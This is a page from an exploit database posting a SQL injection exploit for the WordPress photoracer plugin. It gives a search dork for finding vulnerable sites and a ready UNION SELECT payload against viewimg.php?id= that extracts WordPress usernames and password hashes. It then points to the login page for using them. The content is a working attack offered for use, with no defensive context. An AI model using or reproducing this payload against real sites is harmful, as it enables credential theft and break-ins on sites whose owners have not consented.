[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress v1.0 plugin photoracer SQL Injection Vulnerability

Author
HELLBOY
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12706
Category
web applications
Date add
14-06-2010
Platform
php
============================================================
WordPress v1.0 plugin photoracer SQL Injection Vulnerability
============================================================


#######################################################
#                                     IN THE NAME OF GOD
#
# WORDPRESS v1.0 SQL Injection Vulnerability
#
# Author   : HELLBOY
#
# Tested on Lunix
#
# CVE        : N/A
#
# Gmail    : A68.HELLBOY@GMAIL.COM
#
# Dork     : inurl:"wp-content/plugins/photoracer/viewimg.php?id="
#
########################################################
# Exploit :
# http://[site]/wp-content/plugins/photoracer/viewimg.php?id={SQLI}
#
# EXAM: http://[site]/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
#
# PAGE LOGIN : http://[site]/wp-login.php
#
#########################################################
# Greetz :
#                      All members of the Forum  WwW.ASHIYANE.ORG
#
#########################################################



#  0day.today [2024-12-24]  #